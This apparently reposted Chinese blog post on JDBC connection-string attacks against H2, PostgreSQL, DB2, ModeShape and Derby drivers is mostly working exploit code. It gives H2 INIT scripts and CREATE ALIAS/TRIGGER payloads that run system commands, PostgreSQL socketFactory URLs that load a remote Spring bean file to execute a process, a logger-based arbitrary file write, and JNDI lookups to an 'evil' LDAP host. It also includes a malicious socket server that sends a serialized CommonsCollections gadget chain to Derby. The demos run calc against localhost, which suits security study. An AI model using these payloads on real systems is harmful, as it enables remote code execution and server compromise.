针对除Mysql的其它数据库的jdbc attack分析
H2 是一个用 Java 开发的嵌入式数据库,它本身只是一个类库,即只有一个 jar 文件,可以直接嵌入到应用项目中。H2 主要有如下三个用途:
下载:http://www.h2database.com/html/download.html 看说明书搭建就行
在H2数据库进行初始化的时候或者当我们可以控制JDBC链接时即可完成RCE,并且有很多利用,首先就是INIT,进行H2连接的时候可以执行一段SQL脚本,我们可以构造恶意的脚本去RCE
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException{Runtime.getRuntime().exec(cmd);return "hacker";}';CALL EXEC('calc')
控制JDBC URL为jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8000/poc.sql',点击连接,即可弹出计算器,这种方法得需要账号密码正确
JDBC URL
jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8000/poc.sql'
假如可以执行任意H2 SQL的语句,那么也可以完成RCE,其实上述的INIT实质上也就是执行任意H2的sql语句。而执行语句也有很多讲究。对于上述的INIT需要出网,而我们可以利用加载字节码达到不出网RCE的效果,类似于SPEL以及OGNL注入内存马。 CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : ""; }$$;CALL SHELLEXEC('whoami');
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : ""; }$$;CALL SHELLEXEC('whoami');
除了Alias别名还可以用TRIGGER去手搓groovy或者js代码去rce,但是groovy依赖一般都是不会有的,所以js是更加通用的选择
// groovyClass.forName("org.h2.Driver");String groovy = "@groovy.transform.ASTTest(value={" + " assert java.lang.Runtime.getRuntime().exec(\"calc\")" + "})" + "def x";String url = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE ALIAS T5 AS '" + groovy + "'";// jsCREATE TRIGGER poc2 BEFORE SELECT ONINFORMATION_SCHEMA.TABLES AS $$//javascriptjava.lang.Runtime.getRuntime().exec("calc") $$;
// groovy
Class.forName("org.h2.Driver");
String groovy = "@groovy.transform.ASTTest(value={" + " assert java.lang.Runtime.getRuntime().exec(\"calc\")" + "})" + "def x";
String url = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE ALIAS T5 AS '" + groovy + "'";
// js
CREATE TRIGGER poc2 BEFORE SELECT ON
INFORMATION_SCHEMA.TABLES AS $$//javascript
java.lang.Runtime.getRuntime().exec("calc") $$;
TRIGGER没法在INIT处使用
<dependency> <groupId>org.postgresql</groupId> <artifactId>postgresql</artifactId> <version>42.3.1</version></dependency><dependency> <groupId>org.springframework</groupId> <artifactId>spring-context-support</artifactId> <version>5.3.23</version></dependency>
<dependency>
<groupId>org.postgresql</groupId>
<artifactId>postgresql</artifactId>
<version>42.3.1</version>
</dependency>
<groupId>org.springframework</groupId>
<artifactId>spring-context-support</artifactId>
<version>5.3.23</version>
package com.ctf;import java.sql.Connection;import java.sql.DriverManager;import java.sql.SQLException;public class PsqlJdbcRce { public static void main(String[] args) throws SQLException { String socketFactoryClass = "org.springframework.context.support.ClassPathXmlApplicationContext"; String socketFactoryArg = "http://127.0.0.1:8888/bean.xml"; String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/postgres/?socketFactory="+socketFactoryClass+"&socketFactoryArg="+socketFactoryArg; Connection connection = DriverManager.getConnection(jdbcUrl); connection.close(); }}
package com.ctf;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;
public class PsqlJdbcRce {
public static void main(String[] args) throws SQLException {
String socketFactoryClass = "org.springframework.context.support.ClassPathXmlApplicationContext";
String socketFactoryArg = "http://127.0.0.1:8888/bean.xml";
String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/postgres/?socketFactory="+socketFactoryClass+"&socketFactoryArg="+socketFactoryArg;
Connection connection = DriverManager.getConnection(jdbcUrl);
connection.close();
}
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:p="http://www.springframework.org/schema/p" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="pb" class="java.lang.ProcessBuilder"> <constructor-arg value="calc.exe" /> <property name="whatever" value="#{ pb.start() }"/> </bean></beans>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:p="http://www.springframework.org/schema/p"
xsi:schemaLocation="http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder">
<constructor-arg value="calc.exe" />
<property name="whatever" value="#{ pb.start() }"/>
</bean>
</beans>
postgresql数据库自己搭建,运行代码即可弹出计算器
一张图概括postgres jdbc攻击流程(先知社区的引用一下,如有侵权联系博主删除 在psql的jdbc初始化的时候会读取jdbc链接里的某些参数,并且进行一些操作,断点调试,跟着图中流程走 进入makeConnection,过,到这 进入openConnection 进入openConnectionImpl 进入getSocketFactory,注意这个传入的info就是上面的props 这里开始从info中获取信息,先获取的socketFactoryClassName然后进入instantiate 实例化org.springframework.context.support.ClassPathXmlApplicationContext,传入的args是http://127.0.0.1:8888/bean.xml,实例化我们自定义的bean,造成了rce
makeConnection
openConnection
openConnectionImpl
getSocketFactory
socketFactoryClassName
instantiate
org.springframework.context.support.ClassPathXmlApplicationContext
http://127.0.0.1:8888/bean.xml
跟上面流程差不多,不过这里得注意postgresql数据库得开启ssl,配置文件里设置ssl=on
ssl=on
package com.ctf;import java.sql.Connection;import java.sql.DriverManager;import java.sql.SQLException;public class PsqlJdbcRce { public static void main(String[] args) throws SQLException { String socketFactoryClass = "org.springframework.context.support.ClassPathXmlApplicationContext"; String socketFactoryArg = "http://127.0.0.1:8888/bean.xml";// String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/postgres/?socketFactory="+socketFactoryClass+"&socketFactoryArg="+socketFactoryArg; String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/postgres/?sslfactory="+socketFactoryClass+"&sslfactoryarg="+socketFactoryArg; Connection connection = DriverManager.getConnection(jdbcUrl); connection.close(); }}
// String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/postgres/?socketFactory="+socketFactoryClass+"&socketFactoryArg="+socketFactoryArg;
String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/postgres/?sslfactory="+socketFactoryClass+"&sslfactoryarg="+socketFactoryArg;
package com.ctf;import java.sql.Connection;import java.sql.DriverManager;import java.sql.SQLException;public class PsqlJdbcRce { public static void main(String[] args) throws SQLException {// String socketFactoryClass = "org.springframework.context.support.ClassPathXmlApplicationContext";// String socketFactoryArg = "http://127.0.0.1:8888/bean.xml";//// String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/postgres/?socketFactory="+socketFactoryClass+"&socketFactoryArg="+socketFactoryArg;// String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/postgres/?sslfactory="+socketFactoryClass+"&sslfactoryarg="+socketFactoryArg;// Connection connection = DriverManager.getConnection(jdbcUrl);// connection.close(); String loggerLevel = "debug"; String loggerFile = "test.txt"; String shellContent="test"; String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/test?loggerLevel="+loggerLevel+"&loggerFile="+loggerFile+ "&"+shellContent; Connection connection = DriverManager.getConnection(jdbcUrl); }}
// String socketFactoryClass = "org.springframework.context.support.ClassPathXmlApplicationContext";
// String socketFactoryArg = "http://127.0.0.1:8888/bean.xml";
//// String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/postgres/?socketFactory="+socketFactoryClass+"&socketFactoryArg="+socketFactoryArg;
// String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/postgres/?sslfactory="+socketFactoryClass+"&sslfactoryarg="+socketFactoryArg;
// Connection connection = DriverManager.getConnection(jdbcUrl);
// connection.close();
String loggerLevel = "debug";
String loggerFile = "test.txt";
String shellContent="test";
String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/test?loggerLevel="+loggerLevel+"&loggerFile="+loggerFile+ "&"+shellContent;
可以实现跨目录写文件
<dependency> <groupId>com.ibm.db2</groupId> <artifactId>jcc</artifactId> <version>11.5.0.0</version></dependency>
<groupId>com.ibm.db2</groupId>
<artifactId>jcc</artifactId>
<version>11.5.0.0</version>
docker拉个DB2数据库 docker pull ibmoms/db2express-c docker run -itd --name db2 --privileged=true -p 50000:50000 -e DB2INST1_PASSWORD=db2admin -e LICENSE=accept ibmoms/db2express-c db2start
docker pull ibmoms/db2express-c
docker run -itd --name db2 --privileged=true -p 50000:50000 -e DB2INST1_PASSWORD=db2admin -e LICENSE=accept ibmoms/db2express-c db2start
package com.ctf;import java.sql.DriverManager;import java.sql.SQLException;public class DB2JDBCRCE { public static void main(String[] args) throws ClassNotFoundException, SQLException { Class.forName("com.ibm.db2.jcc.DB2Driver"); DriverManager.getConnection("jdbc:db2://127.0.0.1:50000/BLUDB:clientRerouteServerListJNDIName=ldap://127.0.0.1:1099/evil;"); }}
public class DB2JDBCRCE {
public static void main(String[] args) throws ClassNotFoundException, SQLException {
Class.forName("com.ibm.db2.jcc.DB2Driver");
DriverManager.getConnection("jdbc:db2://127.0.0.1:50000/BLUDB:clientRerouteServerListJNDIName=ldap://127.0.0.1:1099/evil;");
经过一系列不知道什么的东西,最终定位到com.ibm.db2.jcc.am 达到jndi的效果
com.ibm.db2.jcc.am
ModeShape是一个分层的、事务性的、一致的数据存储库,支持查询、全文搜索、事件、版本控制、引用和灵活的动态模式。它非常快,高可用性,高度可伸缩,并且是100%开源的,用Java编写的。客户端使用(JSR-283)标准的Java API或者ModeShape的Rest API,可以通过JDBC和SQL查询内容。
<dependency> <groupId>org.modeshape</groupId> <artifactId>modeshape-jdbc</artifactId> <version>5.4.1.Final</version></dependency><!-- https://mvnrepository.com/artifact/org.modeshape/modeshape-common --><dependency> <groupId>org.modeshape</groupId> <artifactId>modeshape-common</artifactId> <version>5.4.1.Final</version></dependency>
<groupId>org.modeshape</groupId>
<artifactId>modeshape-jdbc</artifactId>
<version>5.4.1.Final</version>
<!-- https://mvnrepository.com/artifact/org.modeshape/modeshape-common -->
<artifactId>modeshape-common</artifactId>
package com.ctf;import java.sql.DriverManager;import java.sql.SQLException;public class modeshapJNDI { public static void main(String[] args) throws ClassNotFoundException, SQLException { Class.forName("org.modeshape.jdbc.LocalJcrDriver"); DriverManager.getConnection("jdbc:jcr:jndi:ldap://127.0.0.1:1099/evil"); }}
public class modeshapJNDI {
Class.forName("org.modeshape.jdbc.LocalJcrDriver");
DriverManager.getConnection("jdbc:jcr:jndi:ldap://127.0.0.1:1099/evil");
进入createConnection 进入initRepository,触发lookup
createConnection
initRepository
<dependency> <groupId>org.apache.derby</groupId> <artifactId>derby</artifactId> <version>10.10.1.1</version></dependency><dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.2.1</version></dependency>
<groupId>org.apache.derby</groupId>
<artifactId>derby</artifactId>
<version>10.10.1.1</version>
<groupId>commons-collections</groupId>
<artifactId>commons-collections</artifactId>
<version>3.2.1</version>
准备一个恶意Socket服务端
package com.ctf;import java.io.IOException;import java.net.ServerSocket;import java.net.Socket;import java.util.Base64;import java.util.concurrent.TimeUnit;public class EvilServer { public static void main(String[] args) throws IOException, InterruptedException { int port = 4851; ServerSocket server = new ServerSocket(port); Socket socket = server.accept(); // CC6 String evil="rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IANG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5rZXl2YWx1ZS5UaWVkTWFwRW50cnmKrdKbOcEf2wIAAkwAA2tleXQAEkxqYXZhL2xhbmcvT2JqZWN0O0wAA21hcHQAD0xqYXZhL3V0aWwvTWFwO3hwcHNyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABHNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWVwdAARZ2V0RGVjbGFyZWRNZXRob2R1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAJ2cgAQamF2YS5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB+ABtzcQB+ABJ1cQB+ABcAAAACcHB0AAZpbnZva2V1cQB+ABsAAAACdnIAEGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwdnEAfgAXc3EAfgASdXEAfgAXAAAAAXQABGNhbGN0AARleGVjdXEAfgAbAAAAAXEAfgAec3EAfgAAP0AAAAAAAAx3CAAAABAAAAAAeHhweA=="; byte[] decode = Base64.getDecoder().decode(evil); // 直接向 socket 中写入 socket.getOutputStream().write(decode); socket.getOutputStream().flush(); Thread.sleep(TimeUnit.SECONDS.toMillis(5)); socket.close(); server.close(); }}
import java.io.IOException;
import java.net.ServerSocket;
import java.net.Socket;
import java.util.Base64;
import java.util.concurrent.TimeUnit;
public class EvilServer {
public static void main(String[] args) throws IOException, InterruptedException {
int port = 4851;
ServerSocket server = new ServerSocket(port);
Socket socket = server.accept();
// CC6
String evil="rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IANG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5rZXl2YWx1ZS5UaWVkTWFwRW50cnmKrdKbOcEf2wIAAkwAA2tleXQAEkxqYXZhL2xhbmcvT2JqZWN0O0wAA21hcHQAD0xqYXZhL3V0aWwvTWFwO3hwcHNyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABHNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWVwdAARZ2V0RGVjbGFyZWRNZXRob2R1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAJ2cgAQamF2YS5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB+ABtzcQB+ABJ1cQB+ABcAAAACcHB0AAZpbnZva2V1cQB+ABsAAAACdnIAEGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwdnEAfgAXc3EAfgASdXEAfgAXAAAAAXQABGNhbGN0AARleGVjdXEAfgAbAAAAAXEAfgAec3EAfgAAP0AAAAAAAAx3CAAAABAAAAAAeHhweA==";
byte[] decode = Base64.getDecoder().decode(evil);
// 直接向 socket 中写入
socket.getOutputStream().write(decode);
socket.getOutputStream().flush();
Thread.sleep(TimeUnit.SECONDS.toMillis(5));
socket.close();
server.close();
package com.ctf;import java.sql.DriverManager;import java.sql.SQLException;public class demo { public static void main(String[] args) throws ClassNotFoundException, SQLException { Class.forName("org.apache.derby.jdbc.EmbeddedDriver");// DriverManager.getConnection("jdbc:derby:dbname;create=true"); DriverManager.getConnection("jdbc:derby:dbname;startMaster=true;slaveHost=127.0.0.1"); }}
public class demo {
Class.forName("org.apache.derby.jdbc.EmbeddedDriver");
// DriverManager.getConnection("jdbc:derby:dbname;create=true");
DriverManager.getConnection("jdbc:derby:dbname;startMaster=true;slaveHost=127.0.0.1");
这里先执行create=true,然后在执行下面这句,可以弹计算器 ReplicationMessageTransmit下的readMessage方法会对socket连接拿到的数据直接进行反序列化
create=true
ReplicationMessageTransmit
readMessage
原文链接:https://www.cnblogs.com/F12-blog/p/18144377
本站QQ群:前端 618073944 | Java 606181507 | Python 626812652 | C/C++ 612253063 | 微信 634508462 | 苹果 692586424 | C#/.net 182808419 | PHP 305140648 | 运维 608723728